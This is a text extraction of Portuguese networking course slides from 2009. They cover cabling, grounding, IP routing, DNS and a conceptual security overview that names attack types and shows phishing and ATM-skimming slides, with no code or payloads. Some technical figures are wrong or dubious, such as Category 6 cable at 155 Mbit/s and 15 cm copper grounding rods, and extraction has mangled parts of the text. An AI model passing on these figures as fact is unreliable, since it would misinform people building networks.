SlideShare ist ein Scribd-Unternehmen logo
1 von 315
1 
REDES AVANÇADAS 
Eudes Danilo Mendonça 12/09/2009 
eudesdanilo@gmail.com 
http://www.4shared.com/file/59507480/8e48421c/ 
SENAI_-_CURSO_AVANCADO_REDES.html
PrĂŠ-requisitos: 
¨ Conhecimentos båsicos em redes 
¨ Quem sou eu? 
¨ Quem são vocês? 
¨ O que esperam da matÊria? 
¨ Quais as experiências em Redes? 
¨ Conhecimentos em Windows Server e/ou 
Linux? 
2 
Apresentação
Sinopse: 
I - RevisĂŁo dos Conhecimentos BĂĄsicos de Redes: Conceitos de Redes, equipamentos, 
perifĂŠricos e conexĂŁo da rede 
II - Noçþes de Cabeamento Estruturado: Conhecimento de Asbuilt, certificação de uma rede, 
elaboração de um anteprojeto de rede, elaboração de um projeto de redes. 
III - Noção de Protocolo de Rede : Conhecimento da camada OSI, estudo do protocolo TCP/IP, 
subnet de rede, roteamento de rede 
IV - Redes Ponto-a-Ponto Projeto; 
V - Segurança de Rede: Noçþes de segurança física e lógica, objetivos, introdução a ataques, 
vulnerabilidade, como previnir ataques 
VI - Windows 2003 Server: Instalação, configuração de serviços (DHCP, DNS, WINS, IIS, FTP), 
servidor de arquivos, servidor de Impressão, Active Direct, Segurança em nível de recursos 
- Permissþes de arquivos, Backup e Recuperação, Logs e Serviços, Monitoramento físico e 
lĂłgico da rede 
VII – Linux: Instalação, configuração de serviços (DHCP, FTP, APACHE, SSH), Segurança em 
nível de Recursos - Permissþes de arquivos, Backup e Recuperação, Logs, Serviços, 
acessos apartir de estaçþes Windows e Transmissão de arquivos entre windows e linux 
VIII - Ambiente Misto: Integração de serviços (WEB, FTP, BACKUP) entre a plataforma 
Windows 2003 e Linux com os clientes Windows XP 3
Plano de Aula: 
Utilização de Notebook e datashow e pråtica nos 
desktops de vocĂŞs; 
Serão avaliaçþes Mensais: 
4 
Avaliação:
Materiais do curso e outros do autor 
¨ Senai 
- Apostila 
http://www.4shared.com/file/51511261/48a51bbd/CURSO_TCNICO_EM_INFORMTICA_-_SENAI_- 
_TURMA_AVANCADA.html 
- Redes Avançadas Power Point 
http://www.4shared.com/file/59507480/8e48421c/SENAI_CURSO_AVANCADO_REDES.html 
- Redes Básicas – Power Point 
http://www.4shared.com/file/72507083/506ae8fd/SENAI_-_CURSO_BASICO_DE_REDES.html 
¨ Esamaz 
Segurança de Sistemas 
http://www.4shared.com/file/39802306/e79291cf/Segurana_de_sistema.html 
Firewall 
http://www.4shared.com/file/40014575/5e5292cb/Firewall.html 
Script Linux 
http://www.4shared.com/file/42267953/f6df6fc4/SCRIPT_LINUX.html 
VĂ­rus 
http://www.4shared.com/file /42802741/12513457/virus.html 
Criptografia 
http://www.4shared.com/file/43349581/53517583/Criptografia.html 
Segurança de Redes 
http://www.4shared.com/file/54429137/c5875aa9/Seguranca_em_Redes_de_Computadores.html 
5
DĂşvidas ?? 
6
I – Revisão dos Conhecimentos 
BĂĄsico de Redes 
7
O que ĂŠ Redes de 
computadores? 
• Possibilitar o compartilhamento de informações (programas e dados) armazenadas nos 
computadores da rede; 
• Permitir o compartilhamento de recursos associados às máquinas interligadas; 
• Permitir a troca de informações entre os computadores interligados; 
• Permitir a troca de informações entre usuários dos computadores interligados; 
• Possibilitar a utilização de computadores localizados remotamente; 
• Permitir o gerenciamento centralizado de recursos e dados; 
• Melhorar a segurança de dados e recursos compartilhados 8
Porque ligar micros em 
rede? 
¨Palavra chave “Compartilhamento”. 
9
Tipos de Redes 
• Usada em redes pequenas (normalmente até 10 micros); 
• Baixo Custo; 
• Fácil implementação; 
• Baixa segurança; 
• Sistema simples de cabeamento; 
• Micros funcionam normalmente sem estarem conectados a rede; 
• Micros instalados em um mesmo ambiente de trabalho; 
• Não existe um administrador de rede; 
• Não existe micros servidores; 
• A rede terá problemas para crescer de tamanho. 
10 
Ponto x Ponto
Cliente x Servidor 
¨ Deseja ter uma maior segurança na rede. (Nesse 
tipo de rede aparece uma figura denominada 
servidor. O servidor ĂŠ um computador que oferece 
recursos especializados, para os demais micros da 
rede, ao contrĂĄrio do que acontece com a rede 
ponto-a-ponto onde os computadores compartilham 
arquivos entre si e tambĂŠm podem estar fazendo um 
outro processamento em conjunto). 
¨ Outra vantagem das redes cliente/servidor Ê a forma 
centralizada de administração e configuração, o que 
melhora a segurança e organização da rede. 
11
Tipos de Servidores 
¨ Servidor de Arquivos: É um servidor responsável pelo armazenamento de 
arquivos de dados – como arquivos de texto, planilhas eletrônicas, etc... É 
importante saber que esse servidor sĂł ĂŠ responsĂĄvel por entregar os dados 
ao usuĂĄrio solicitante (cliente), nenhum processamento ocorre nesse servidor, 
os programas responsĂĄveis pelo processamento dos dados dos arquivos 
deve estar instalados nos computadores clientes. 
¨ Servidor de Impressão: É um servidor responsável por processar os 
pedidos de impressĂŁo solicitados pelos micros da rede e enviĂĄ-los para as 
impressoras disponĂ­veis. Fica a cargo do servidor fazer o gerenciamento das 
impressĂľes. 
¨ Servidor de Aplicações: É responsável por executar aplicações do tipo 
cliente/servidor como, por exemplo, um banco de dados. Ao contrĂĄrio do 
servidor de arquivos, esse tipo de servidor faz processamento de 
informaçþes. 
¨ Servidor de Correio Eletrônico: Responsåvel pelo processamento e pela 
entrega de mensagens eletrĂ´nicas. Se for um e-mail destinado a uma pessoa 
fora da rede, este deverå ser passado ao servidor de comunicação (firewall) 
¨ Servidor de Comunicação (Firewall): Usado para comunicação da sua 
rede com outras redes, como a Internete Se vocĂŞ acessa a Internet atravĂŠs 
de uma linha telefônica convencional, o servidor de comunicação pode ser um 
computador com uma placa de modem ou conexĂľes com ADSL ou LPCD. 
12
Vantagens e Desvantagem do Cliente x 
Servidor ¨ Custo Maior desempenho do que as redes ponto-a-ponto; 
¨ Implementação necessita de especialistas; 
¨ Melhor desempenho que as redes ponto-a-ponto; 
¨ Alta segurança; 
¨ Configuração e manutenção na rede Ê feita de forma centralizada; 
¨ Existência de servidores, que são micros capazes de oferecer recursos 
aos demais micros da rede 
13
II - Noçþes de Cabeamento 
Estruturado 
14
Cabeamento Estruturado 
¨Conector RJ45 Macho 
15
Cabeamento Estruturado 
¨ Cabo UTP 
¨ UTP Color Codes 
Par 1 Branco-Azul (BA) / Azul (A) 
Par 2 Branco-Laranja (BL) / Laranja (L) 
Par 3 Branco-Verde (BV) / Verde (V) 
Par 4 Branco-Marrom (BM) / Marrom (M) 
16
Cabeamento Estruturado 
Cabo UTP / CATEGORIAS 
¨ Categoria 1 – cabo de par trançado tradicional, que é o utilizado para 
telefonia (instalado antes de 1983). Não Ê recomendado para utilização 
em redes locais. 
¨ Categoria 2 – cabo certificado para transmissão de dados (possui 4 
pares trançados). Sua utilização em redes tambÊm não Ê recomendåvel. 
¨ Categoria 3 – esta categoria suporta 10 Mbit/sec numa rede Ethernet, 
4Mbit/s em uma Token Ring. Este cabo permite que atĂŠ quatro telefones 
normais ou dois multilinhas sejam conectados ao equipamento da 
companhia telefĂ´nica. 
¨ Categoria 4 – esta categoria suporta taxas de transmissão de até 16 
Mbit/s em uma rede Token Ring. Este cabo possui quatro pares. 
¨ Categoria 5 – possui 4 pares trançados com oito torções. Suporta taxas 
de transmissão de 100 Mbit/s. Sua utilização Ê adequada para redes Fast 
Ethernet e redes ATM. No inĂ­cio dos anos 90, 60% dos edifĂ­cios possuĂ­am 
este tipo de cabo (EUA). 
¨ Categoria 6 – também possui 4 pares trançados. Suporta taxas de 
transmissão de atÊ 155 Mbit/s. Sua utilização Ê adequada a redes Fast 
Ethernet para transmissĂŁo de dados e voz. 
17
Cabeamento Estruturado 
¨Crimpador 
¨Testador 
18
Cabeamento Estruturado 
¨Delay 
É um dos itens mais importantes, pois a estruturação física pode 
influenciar na performance e velocidade da rede. É ideal que 
tenha o menor número de segmentação e quando ocorrer a 
segmentação que seja centralizado os servidores, pontos de 
saĂ­da da rede e principais clientes no switch principal. 
19
Cabeamento Estruturado 
¨Processo da Crimpagem 
Normal - Padronização EIA/TIA 568ª – Conhecida 
como “seqüência de crimpagem de normal”. Utilizada para 
conexĂŁo de um microcomputador a um HUB ou SWITCH. 
20 
EIA/TIA-568ÂŞ 
1. Branco-Verde 
2. Verde 
3. Branco-Laranja 
4. Azul 
5. Branco-Azul 
6. Laranja 
7. Branco-Marrom 
8. Marrom
Cabeamento Estruturado 
¨Crossover - Um cabo crossover consiste na interligação de 
2 (dois) computadores pelas respectivas placas de rede sem ser 
necessårio a utilização de um concentrador (Hub ou Switch) ou a 
ligação de modems a CABO com a maquina cliente com conectores 
do tipo RJ45. A alteração dos padrþes das pinagens dos cabos torna 
possível a configuração de cabo crossover ou cabo direto. A ligação Ê 
feita com um cabo de par trançado (na maioria das vezes) onde se 
tem: em uma ponta o padrĂŁo T568A, e, em outra o padrĂŁo T568B 
(utilizado tambĂŠm com modems ADSL). 
21 
1ÂŞ ponta do 
cabo 
branco verde 
verde 
branco laranja 
azul 
branco azul 
laranja 
branco marrom 
marrom 
2ÂŞ ponta do 
cabo 
branco laranja 
laranja 
branco verde 
azul 
branco azul 
verde 
branco marrom 
marrom
Cabeamento Estruturado 
¨1ª Pråtica: Processo da 
Crimpagem 
22
Cabo Normal 
23
Cabo Crowwover 
24
Cabeamento Estruturado 
¨Certo 
¨Errado 
25
Cabeamento Estruturado 
¨O que não pode ocorrer 
26
Cabeamento Estruturado 
¨O que não pode ocorrer 
27
Cabeamento Estruturado 
28
Cabeamento Estruturado 
29
Cabeamento Estruturado 
30
Cabeamento Estruturado 
31 
2ÂŞ PrĂĄtica: Processo da Crimpagem
Cabeamento Estruturado 
32
Cabeamento Estruturado 
33
Cabeamento Estruturado 
34
Cabeamento Estruturado 
35
Cabeamento Estruturado 
36
SugestĂŁo para a Rede ElĂŠtrica 
¨Ideal ter a cada circuito de 10 A atÊ 3 
tomadas; 
¨Não permitir que sejam ligados outros 
equipamentos como: Copiadoras, 
ventiladores, motores elĂŠtricos, ou 
qualquer outro que exija ou produza 
ruĂ­do na linha. 
37
SugestĂŁo para a Rede ElĂŠtrica 
38
SugestĂŁo para a Rede ElĂŠtrica 
¨As tomadas devem ser do tipo 
universal de trĂŞs pinos (tripolares) e a 
ligação fase/neutro/terra 
¨ As tensþes aproximadas na rede elÊtrica deverão ser as 
seguintes: 
Entre terra e fase = 117 V 
Entre neutro e fase = 115 V 
Entre terra e neutro = 2,5 V(valor Maximo tolerado) 39
SugestĂŁo para a Rede ElĂŠtrica 
40
Aterramento 
¨ O terra dos equipamentos de informåtica DEVE ser 
totalmente independente dos demais terras 
existentes. 
¨ Observando o seguinte na instalação: 
Ser construído å distância mínima de 2,40m dos outros 
terras do quadro e do neutro e a uma distância 
mĂ­nima de 25,00 do terra de pĂĄra-raios. 
O cabo que liga as barras de aterramento ao quadro 
deve ser encapado, possuir bitola compatĂ­vel com a 
distancia entre o sistema e o quadro, e NÃO 
DEVERÁ ESTAR NUNCA CONECTADO AO 
NEUTRO.Não são aconselhåveis distâncias maiores 
que 50m entre o terra e o quadro de distribuição. 
41
Aterramento 
¨ Material necessårio para um aterramento simples: 
- 3 barras de cobre, com 2 a 3 metros de comprimento e 15cm de 
diâmetro. 
- 6 abraçadeiras de bronze para as barras de cobre. 
- 10 metros de fio isolado, de bitola idĂŞntica ĂĄ dos fios fase e 
neutro. 
- Sal grosso, carvĂŁo vegetal e enxofre em quantidades suficientes 
para cobrir o poço dos eletrodos. 
- Água destilada suficiente para regar a mistura. 
- As barras de cobre sĂŁo chamadas eletrodos de aterramento; dĂŁo 
uma referĂŞncia de terra de 0 volte uma conexĂŁo ĂĄ terra para 
descargas elĂŠtricas atmosfĂŠricas. TambĂŠm fornecem uma 
trajetória de impedância baixa å terra ( valor måximo de 25 
ohms). 
42
Aterramento 
43
Aterramento 
¨ Consequências da falta de 
aterramento: 
- Aparição de BAD CLUSTERS no HD ou atÊ 
mesmo a perda total. Isto nĂŁo demora a 
acontecer. 
- VocĂŞ poderĂĄ perder seu HD em 2 ou 3 meses. 
- Danos na placa mĂŁe. 
- Danos na memĂłria, que podem vir a causar 
perda repentina de dados e ou congelamento 
de todo o sistema. 
44
DOCUMENTAR UMA REDE 
¨Físicamente: 
- Asbuilt 
¨Lógicamente: 
- Software InventĂĄrio; 
(http://www.softwarepublico.gov.br/spb/ver-comunidade? 
community_id=3585) 
- Help Desk; (http://ocomonphp.sourceforge.net/) 
- Analyzer Network; (Network supervisor – 3COM) 
- Logs (Firewall, event view, /var/log/messages) 
45
Criação de AnteProjeto de Rede 
¨Veja quando falamos em projeto, não 
queremos e nĂŁo vamos formar 
engenheiros aqui, nossa intenção e 
mostrar que uma documentação bem 
feita pode ser o diferencial dentro desta 
ĂĄrea , o projeto pode ser escrito, nĂŁo 
necessariamente um desenho, lĂłgico 
que se possuir o desenho ĂŠ muito 
melhor, mesmo porque hoje existem 
ferramentas para auxiliar neste 
propĂłsito. 
46
Criação de AnteProjeto de Rede 
47
Elaboração de um Projeto de Rede 
48 
¨ Informaçþes repassada pelo empresa: 
- 1 Caso: Rede 100 % cabeada; 
- 2 Caso: Rede Mista 
¨ Criação da Documentação do Projeto: 
- Crianção do Site Survey; 
- Criação do anteprojeto; 
- Entrega do Asbuilt pela empresa prestadora 
do serviço;
Criação dos Site Survey – 1 Caso 
49
Criação dos Site Survey – 2 Caso 
50
VisĂŁo Macro
Exercício: Criação de 
anteprojeto 
52 
¨ Informaçþes repassada pelo empresa (Site 
Survey): 
- As paredes externas são de cerâmico aparente e as paredes 
internas, incluindo as salas laterais , de reboco liso e pintado; 
- O teto ĂŠ de forro falso e o piso ĂŠ de granito natural; 
- O departamento de telemarketing possui divisĂłrias baixas 
acústicas em formas de “baias”, de madeira, revestida com 
espuma de poliuretano e tecido grosso; 
- Toda iluminação Ê feita com luminårias com 4 lâmpadas 
fluorescentes de 40 W x 220 V e localizada no centro 
geomĂŠtrico de cada ambiente; 
- Altura entre o forro e o piso ĂŠ de 2,6m; 
- A sala de treinamento, recebe freqĂźentemente pessoas nĂŁo 
ligadas a empresa, alĂŠm disso seu layout ĂŠ constantemente 
alterado;
Exercício: Criação de 
anteprojeto 
53
54 
III – Noções de Protocolo de 
rede
Protocolos - Definição
56
A Mensagem em Camadas 
Remetente 
Mensagem 
Escrita 
Envelope 
AgĂŞncia 
-VocĂŞ tem uma idĂŠia e DestinatĂĄrio 
deseja comunica-la a 
outra pessoa 
-Tem de escolher a forma 
de expressar essa idĂŠia 
-VocĂŞ decide como de 
uma forma apropriada 
-Enfim, de fato expĂľe sua 
idĂŠia 
Rodovia/Malote 
Mensagem 
Escrita 
Envelope 
AgĂŞncia
Protocolo TCP/IP
O que configurar ? 
¨IP 
¨MASCARA 
¨GATEWAY 
¨DNS 
59
Onde, o que e por que 
Configurar
IP e MASCARA 
61
Endereços IP 
¨Endereço IP: Indentificador de Rede 
+ Indentificador de HOST 
62 
Endereço IP de 32 bits 
Identificador da 
rede 
Identificador do 
host 
REDE 
internet 
REDE 
REDE REDE 
hosts com o 
mesmo 
identificador de 
rede. 
host 
hosts com 
identificadores 
de rede 
distintos.
63 
Como atribuir IP’s para rede 
abaixo? 
SÃO PAULO CURITIBA 
... 
... 
230 computadores 200 computadores
64 
endereço classe C 
MÁSCARA: 255.255.255.0 
identificador de rede identificador do host 
200.0.0.3 200.0.0.4 200.0.0.5 
roteador 
200.0.0.2 
200.0.0.1 
200.0.1.1 
200.0.1.2 200.0.1.3 200.0.1.4 200.0.1.5 
O roteador possui dois endereços IP, um para cada rede.
65 
Como Atribuir IP’s para rede abaixo? 
SÃO PAULO CURITIBA 
... 
... 
400 computadores 600 computadores 
... 
500 computadores 
RIO DE JANEIRO
Solucionar Principais Problemas 
¨ Usando o Utilitårio IPConfig 
O utilitĂĄrio IPConfig ĂŠ muito Ăştil para determinar se as 
configuraçþes de rede atuais são desejadas. Vårios erros 
podem ser detectados atravĂŠs deste utilitĂĄrio. Execute-o 
atravĂŠs de um Prompt de Comando (clique em Start -> Run e 
digite CMD), digitando ipconfig /all e teclando Enter.
Solucionar Principais Problemas 
¨ Conflito de IP: Ocorre quando um IP manual Ê atribuído à måquina e jå 
existe outro computador na rede com o mesmo IP. Nesse caso, a tela do 
Ipconfig deve se parecer com a seguinte: 
¨ Note que os campos IP e Måscara de Subrede estão zerados. Essa Ê a 
principal caracterĂ­stica de um conflito de IPs. 
- Configuração incompleta: Certifique-se de que os campos DNS Servers e 
Default Gateway nĂŁo estĂŁo em branco.
Solucionar Principais 
Problemas 
¨ Note que, como não hå servidor DNS e nem Default Gateway 
configurados, o computador somente poderĂĄ enviar e receber 
dados dentro da rede local e com outros computadores
Solucionar Principais 
Problemas ¨Usando o Utilitårio PING 
Ela se refere ao utilitĂĄrio do TCP/IP denominado "Ping", que tem como 
função testar se um host estå ativo, enviando um pacote de dados 
para esse host e pedindo uma reposta caso ele esteja online e 
funcionando corretamente. Então, "pingar" o endereço de loopback 
simplesmente testa se sua mĂĄquina inicializou o TCP/IP corretamente. 
Para fazer isso, entre em um Prompt de Comando e digite: ping 
127.0.0.1 e tecle Enter. VocĂŞ tambĂŠm poderĂĄ pingar no IP da placa 
assim como de qualquer mĂĄquina da rede, assim como por nome 
dependendo de alguns serviços. Vale ser ressalta que o ping pode ser 
desabilitado.
Solucionar Principais 
Problemas ¨ Usando o Utilitårio NETSTAT e TELNET 
NETSTAT – verifica os serviços que localmente a máquina/host está 
provendo 
TELNET: Tem como função testar se o serviço estå ativo. Para fazer isso, 
entre em um Prompt de Comando e digite: telnet IP PORTA_SERVICO. 
Este Teste serve tanto se vocĂŞ local ou remoto da mĂĄquina que estĂĄ 
provendo o serviço.
GATEWAY 
71
Roteamento Indireto 
¨Origem e Destino estão em redes 
diferentes 
10.35.143.10 10.35.144.15 
REDE 
10.35.143.0 
Tabela de Roteamento 
Destino Gateway 
10.35.143.0 DIRETO 
0.0.0.0 10.35.143.1 
10.35.143.1 10.35.144.1 
Router 
REDE 
10.35.144.0 
Tabela de Roteamento 
Destino Gateway 
10.35.143.0 10.35.143.1 
10.35.144.0 10.35.144.1 
....... ....... 
Tabela de Roteamento 
Destino Gateway 
10.35.144.0 DIRETO 
0.0.0.0 10.35.144.1
Exemplo de roteamento 
Exemplo de uma rede Intranet constituĂ­da de duas 
redes fĂ­sicas conectadas por um roteador. 
192.168.0.1 192.168.0.2 192.168.0.3 192.168.0.4 
192.168.0.5 
192.168.1.5 
roteador 
interno 
rede 192.168.0.x 
rede 192.168.1.x servidor 
192.168.1.1 192.168.1.2 192.168.1.3 192.168.1.4 
rede interna de uma empresa.
Tabelas de Roteamento
Exemplo de Tabela de Roteamento 
TABELA DO ROTEADOR 1: 
Rede Gateway Interface 
200.134.51.0 (255.255.255.0) 200.134.51.1 200.134.51.1 
200.17.98.0 (255.255.255.0) 200.17.98.23 200.17.98.23 
0.0.0.0 (0.0.0.0) 200.130.0.2 200.130.0.1 
75 
200.17.98.23 
roteador 
1 
INTERNET 
roteador 
2 
REDE 200.17.98.X 
REDE 200.134.51.X 
200.130.0.1 200.130.0.2 
200.134.51.1
ExercĂ­cio 1 
¨ Construa a tabela de roteamento do Roteador 1 
76 
200.17.98.0 
200.0.0.1 200.0.0.2 
200.17.98.23 
INTERNET 
1 
255.255.255.0 
200.134.51.0 
255.255.255.0 
200.17.98.1 200.134.51.1 
INTERNET 3 
2
77 
TABELA DE ROTEAMENTO 
Rede Destino Mascara Gateway Interface Custo
TABELA DE ROTEAMENTO 
Rede Destino Mascara Gateway Interface Custo 
200.134.51.0 255.255.255.0 200.134.51.1 200.134.51.1 1 
200.17.98.0 255.255.255.0 200.17.98.1 200.17.98.1 1 
0.0.0.0 0.0.0.0 200.0.0.1 200.0.0.2 1 
0.0.0.0 0.0.0.0 200.17.98.23 200.17.98.1 2
79 
ExercĂ­cio 2: 
¨ Utilizando a classe C: 200.0.0.0 (255.255.255.0) 
– A) distribua os IP’s nas duas redes abaixo 
– B) defina a tabela de roteamento do roteador 1. 
1 2 INTERNET 
100 
computadores 
100 
computadores
DNS 
80
DNS - Domain Name Service 
¨Padrão Aberto para Resolução de 
Nomes HierĂĄrquicos 
– Agrupa nomes em domínios. 
– A árvore de nomes é armazenada num 
banco ddee ddaaddooss ddiissttrriibbuuĂ­Ă­ddoo. 
¨Especificaçþes do DNS 
– RFCs 1033, 1034, 1034, 1101, 1123, 1183 
e 1536. 
• Expecificações da Internet Task Force 
– Berkeley Internet Name Domain (BIND) 
• Implementação desenvolvida na Berkley 
University para a versĂŁo 4.3 SD Unix
S Demonstraçþes: Seerrvviiççooss ddee NNoommeess 
A função principal dos serviços de 
nomes ĂŠ traduzir nomes de domĂ­nio para os 
seus respectivos endereços IP’s. 
wwwwww..coai.dceo.cmo m= 1=0 3.15.03.51.02..180 
wwwwww.c.aodi.ec.ocmom 
wwwwww..auvfg.c.bomr = =5 02.07.52.09.62.08.80 
wwwwww..auvfg.c.borm 
SSeerrvviiddoorr DDNNSS
83 
IV – Redes Ponto a Ponto
Elaboração de Projeto 
84
Elaboração de Projeto 
¨Criar uma formulårio / checklist de 
informaçþes que deverão que serão 
coletadas junto a conversa inicial. 
85 
Qual a finalidade ? 
Quem vai acessar (de onde, como, que solução) ? 
Quantos computadores ? 
De onde vai ser o acesso ? 
Q o s ? 
Local FĂ­sico (disponibilidade para cabeamento)
Elaborar uma proposta / 
Solução. ¨ Itens informados: 
- 2 casas (distante 500 mts) sendo que uma 
ĂŠ tombada pelo patrimĂ´nio histĂłrico; 
- Acesso de usuĂĄrio em uma rede local e 
clientes via Web (internet); 
- Acesso de funcionĂĄrios a pastas 
especĂ­ficas de arquivos, assim como 
acesso ao sistema corporativo; 
- 500 computares (300 comp. Em uma casa 
e 200 em outra); 
- NĂŁo posso para meu acesso nem por 1 
minuto 86
Ilustração do funcionamento do 
TCP/IP 
¨Vídeo “Guerreiros da Internet”
88 
V - Segurança de Redes
89 
O sistema informĂĄtico mais 
seguro nĂŁo ĂŠ utilizĂĄvel 
O sistema informĂĄtico mais 
utilizĂĄvel ĂŠ inseguro 
SĂł existe um computador 100% 
seguro, o desligado.
90 
Introdução 
¨ A Segurança da Informação pode ser 
definida como a proteção de dados 
contra a revelação acidental ou 
intencional a pessoas nĂŁo autorizadas, e 
contra alteraçþes não permitidas. 
¨ A segurança no universo computacional 
divide-se em: 
– Segurança Física 
– Segurança Lógica
91 
Introdução (cont.) 
¨Objetivo da Segurança Informåtica 
– Seja qual for a dimensão de um sistema 
informĂĄtico, deve procurar-se atingir, na 
sua exploração, os seguintes objetivos: 
• Integridade do equipamento 
• Confidencialidade e a qualidade da 
informação 
• Prontidão do sistema (eficiência x 
eficĂĄcia)
O que vocĂŞ estĂĄ tentando 
proteger? 
¨Seus dados 
Integridade 
Privacidade 
Disponibilidade 
¨Seus recursos 
¨Sua reputação 
92
Contra o que vocĂŞ estĂĄ tentando 
se proteger? 
¨Roubo de senhas 
¨Engenharia Social 
¨BUG & Backdoors 
¨Falha de autenticação 
¨Falha de protocolo 
¨Obtendo Informaçþes 
¨Negando serviços (DoS) 
93
94 
Objetivos da Segurança 
¨ O objetivo da segurança da informação 
abrange desde uma fechadura na 
porta da sala de computadores atĂŠ o 
uso de tĂŠcnicas criptogrĂĄficas 
sofisticadas e códigos de autorização . 
¨ O estudo não abrange somente o crime 
computacional (hackers), envolve 
qualquer tipo de violação da 
segurança, como erros em 
processamento ou cĂłdigos de 
programação .
Objetivos da Segurança 
“Segurança não é uma tecnologia” 
Quem? 
O que? 
Quando? 
Como? 
Onde? 
Porque?
96 
Objetivos da Segurança 
¨A segurança de dados tem por 
objetivo restringir o uso de 
informaçþes (softwares e dados 
armazenados) no computador e 
dispositivos de armazenamento 
associados a indivĂ­duos selecionados.
Os objetivos da Segurança da 
Informação são: 
¨Preservação do patrimônio da empresa 
(os dados e as informaçþes fazem 
parte do patrimĂ´nio ). 
– Deve-se preservá-lo protegendo-o contra 
revelaçþes acidentais, erros operacionais e 
contra as infiltraçþes que podem ser de 
dois tipos: 
97 
• Ataques passivos (interceptação) 
• Ataques ativos (interrupção, 
modificação e Fabricação)
Ataques passivos 
AAtataqquueess P Paassssivivooss 
Intercepção 
AnĂĄlise do 
conteĂşdo das 
mensagens 
AnĂĄlise do trĂĄfego 
O objetivo Ê obter informação que estå a ser transmitida. 
Este tipo de ataques Ê muito difícil de detectar. O esforço de 
protecção deve ser no sentido da prevenção.
Ataques Passivos 
¨ Análise do conteúdo das mensagens – Escutar e 
entender as informaçþes. 
¨ Análise do tráfego – O oponente pode determinar a 
origem e identidade das comunicaçþes e pode 
observar a frequĂŞncia e comprimento das mesmas. 
Esta informação pode ser útil para determinar a 
natureza da comunicação. Os ataques passivos 
sĂŁo muito difĂ­ceis de detectar porque nĂŁo 
envolvem nenhuma alteração de dados. A 
ênfase ou o esforço deve desenvolvido no 
sentido da prevenção e não da detecção.
Emissor Receptor 
Intercepção 
Intercepção 
Intercepção – Quando utilizadores não autorizados conseguem 
aceder a recursos para os quais não estavam autorizados. É 
um ataque Ă  confidencialidade. A parte nĂŁo autorizada pode 
ser uma pessoa, um programa ou um computador. Exemplos: 
violação de cabos de comunicação, para capturar dados da 
rede, cĂłpia ilĂ­cita de pastas e programas, etc.
AAtataqquueess A Atitvivooss 
Interrupção 
(Disponibilidade) 
Modificação 
(Integridade) 
Fabricação 
(Autenticidade) 
Ataques Ativos 
¨ Envolvem alguma modificação de dados. 
¨ Este tipo de ataques Ê muito difícil de prever, jå que, para isso, 
seria necessårio uma proteção completa de todos os tipos de 
comunicaçþes e de canais. Por esta razão, o esforço de 
protecção deve ser no sentido de os detectar e recuperar dos 
atrasos ou estragos entretanto causados.
Interrupção 
Emissor Receptor 
Interrupção 
Interrupção – A informação de um sistema torna-se 
indisponível ou é destruída. É um ataque à 
disponibilidade. 
Exemplos: Destruição de peças de Hardware, o corte de linhas 
de comunicação, a inoperância do sistema de ficheiros, etc.
Modificação 
Emissor Receptor 
Modificação 
Modificação – uma parte não autorizada, não só acede à 
informação, mas também a modifica. É um ataque de 
integridade. Exemplos: alteração de valores num ficheiro de 
dados; alteração de um programa para que ele funcione de 
maneira diferente ou modificação do conteúdo de mensagens 
transmitidas pela rede.
Emissor Receptor 
Fabricação 
Fabricação 
Fabricação – uma parte não autorizada insere dados 
falsos no sistema. É um ataque à autenticidade. 
Exemplos: inserção de mensagens simuladas na 
rede ou a adição de registos a um ficheiro.
105 
O que ĂŠ ataque? 
Ataque Ê toda ação realizada com 
intuito ou nĂŁo de causar danos .
Vulnerabilidades 
¨Todo computador Ê vulneråvel a 
ataques. (Possui informação) 
• Tipos de Vulnerabilidades 
– Vulnerabilidades Físicas (Meio, Construção) 
– Vulnerabilidades Naturais (Desastres Naturais) 
– Vulnerabilidades de Hardware e Software(Falhas) 
– Vulnerabilidades de Media (Roubos de Media) 
– Vulnerabilidades de Comunicação (Hacker) 
– Vulnerabilidades de Humanos (Usuários) 
– Vulnerabilidades sobre Exploit (Brechas, Copias)
Um ataque tĂ­pico 
107
Anatomia de um ataque 
Varredura Reconhecimento 
Enumeração 
InvasĂŁo Escalando 
privilĂŠgios 
Acesso Ă  
informação 
Ocultação 
de rastros 
Negação de 
Serviços 
Instalação de 
back doors
109
110
O que um hacker ataca ? 
Aplicaçþes 
Banco de dados 
Sistemas operacional 
Serviços de rede
112 
Tipos de ataques conhecidos 
• Escutas 
– Packet Sniffing – escuta e inspeciona cada pacote da rede 
– IP/Session Hijacking – interceptação da seção pelo invasor 
• Senha 
– Uso de dicionário de senhas 
– Força bruta – tentativa e erro 
• Outros ataques 
– Alteração de site (web defacement) 
– Engenharia social 
– Ataque físico às instalações da empresa 
– Uso de cavalos de tróia e códigos maliciosos 
– Trashing – revirar lixo em busca de informações 
– War dialing – liga para vários números de telefone para identificar 
os que tem modem instalado
113 
Motivação para o Ataque 
• Por quê existem as invasões aos sistemas? 
– Orgulho 
– Exibicionismo/fama 
– Busca de novos desafios 
– Curiosidade 
– Protesto 
– Roubo de informações 
– Dinheiro 
– Uso de recursos adicionais 
– Vantagem competitiva 
– Vingança
114 
Exemplo: Oliberal 10/02/08
Caso Real 
Atualmente 70% das quebras de 
segurança corporativas são geradas 
internamente.
Caso Real 
Perfil do Fraudador*: 
• 68% estão na Média e Alta Gerências 
• 80% tem curso superior completo 
• Predominantemente do Sexo Masculino 
• Idade média entre 31 e 40 anos 
*Pesquisa sobre crimes econĂ´micos - PWC 05
117 
Tipos de ataques conhecidos 
• Negação de serviços 
– Syn Flood – inundar a fila de SYN para negar novas conexões 
– Buffer overflow – colocar mais informações do que cabe no buffer 
– Distributed DoS (DDoS) – ataque em massa de negação de serviços 
– Ping of Death – envio de pacote com mais de 65507 bytes 
– Smurf – envio de pacote ICMP em broadcast a partir de uma máquina, 
sendo inundada com as respostas recebidas 
– CGI exploit 
– Land, syn flooding, ... 
• Simulação 
– IP Spoofing – uso do IP de uma máquina para acessar outra 
– DNS Spoofing – assumir o DNS de outro sistema 
• Investigação 
– Port scanning – varredura de portas para tentar se conectar e invadir 
• Spam 
– Acesso a um grande número de pessoas, via email, com link para sites 
clonados que pedem informaçþes pessoais
Ex: Email para roubo de informaçþes 
118
Ex: Email para roubo de informaçþes 
119
Ex: Email para roubo de informaçþes 
120
Ex: Email para roubo de informaçþes 
121
Ex: Email para roubo de informaçþes 
122
Ex: Email para roubo de informaçþes 
123
Ex: Email para roubo de informaçþes 
124
Ex2: Clonagem de cartĂŁo de banco 
125 
Bocal 
preparado
Ex2: Clonagem de cartĂŁo de banco 
126 
ImperceptĂ­vel 
para o cliente
Ex2: Clonagem de cartĂŁo de banco 
Micro câmera 
disfarçada de 
porta panfleto
Ex2: Clonagem de cartĂŁo de banco 
128 
VisĂŁo 
completa da 
